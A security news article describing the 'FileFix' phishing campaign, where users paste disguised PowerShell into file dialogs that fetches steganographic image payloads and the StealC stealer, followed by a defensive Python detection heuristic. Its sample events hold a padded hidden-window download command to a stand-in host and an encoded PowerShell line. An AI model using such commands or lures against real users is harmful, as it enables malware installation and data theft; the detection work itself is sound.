FileFix attack tricks users into opening infected images
A new social engineering attack, dubbed “FileFix,” has been uncovered by Acronis’ Threat Research Unit. This sophisticated campaign is a refined version of traditional ClickFix attacks, where threat actors manipulate victims into executing malicious commands and installing malware on their devices. Unlike previous methods that relied on fake CAPTCHA prompts or Windows Run dialogues, FileFix exploits file upload interfaces on phishing websites. The attack begins when users visit convincing phishing sites that impersonate legitimate platforms, such as Facebook Security. Victims are misled into pasting what appears to be a file system path into a file selector dialogue box. In reality, this “file path” is an obfuscated Microsoft PowerShell script that executes immediately upon being pasted, relying on the user’s own actions to launch the malware.
Once the initial PowerShell payload is executed, it downloads malicious JPEG images containing malware code embedded through steganographic techniques. This method conceals a secondary script with executable payloads encrypted with RC4, allowing multiple files to be hidden within a single image. The PowerShell script then extracts and executes the concealed code from these seemingly harmless images. The final stage deploys a Go-based loader that conducts environment checks before launching StealC, an information-stealing malware. Acronis has observed multiple variants of this attack emerging within a two-week timeframe, supported by a global infrastructure that spans multiple countries. To mitigate the risks, Acronis recommends user education and training to help individuals recognise suspicious copy-and-paste operations on their computers.
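A defender-side heuristic for the paste-into-file-dialog step, added here as an illustration and not taken from the Acronis report. It assumes process-creation telemetry (Sysmon Event ID 1 or an EDR feed) in which the pasted PowerShell appears as a child of the File Explorer process, and that the lure pads the command with whitespace so only a trailing fake document path is visible; both are assumptions, not details the article states. The sample events are constructed.

```python
import re

# Constructed sample telemetry (not from the article), normalised to
# parent image, child image and full command line.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "iwr http://example.invalid/a.jpg"'
            + " " * 120 + r"C:\Users\Public\Documents\Invoice.pdf"},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"id": 3, "parent": "cmd.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -enc SQBFAFgAIAAoAG4AZQB3AC0AbwBiAGoA"},
    {"id": 4, "parent": "explorer.exe", "image": "notepad.exe",
     "cmd": "notepad.exe readme.txt"},
]

# Assumed lure traits: a long run of spaces pushes the real command out of the
# dialog's visible width, leaving a decoy document path at the end.
PAD_RE = re.compile(r"\s{20,}")
DECOY_RE = re.compile(r"\s[A-Za-z]:\\[^\s\"']+\.(pdf|docx?|xlsx?|jpe?g|png)\s*$", re.I)
ENC_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev):
    """Return the list of suspicious traits seen on one process-creation event."""
    reasons = []
    if _basename(ev["image"]) != "powershell.exe":
        return reasons
    if _basename(ev["parent"]) == "explorer.exe":
        reasons.append("powershell spawned by explorer.exe (file dialog / address bar)")
    cmd = ev["cmd"]
    if PAD_RE.search(cmd):
        reasons.append("long whitespace padding in command line")
    if DECOY_RE.search(cmd):
        reasons.append("trailing decoy document path")
    if ENC_RE.search(cmd):
        reasons.append("encoded command")
    return reasons


def flag_filefix(events, min_reasons=2):
    """Flag events that combine at least min_reasons traits, to keep admin scripts out."""
    return [(ev["id"], score_event(ev)) for ev in events
            if len(score_event(ev)) >= min_reasons]


if __name__ == "__main__":
    for event_id, reasons in flag_filefix(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Event 2 (a routine admin script launched from Explorer) and event 3 (encoded PowerShell from cmd.exe) each carry a single trait and are left alone; requiring two traits is what keeps the rule usable on a busy fleet.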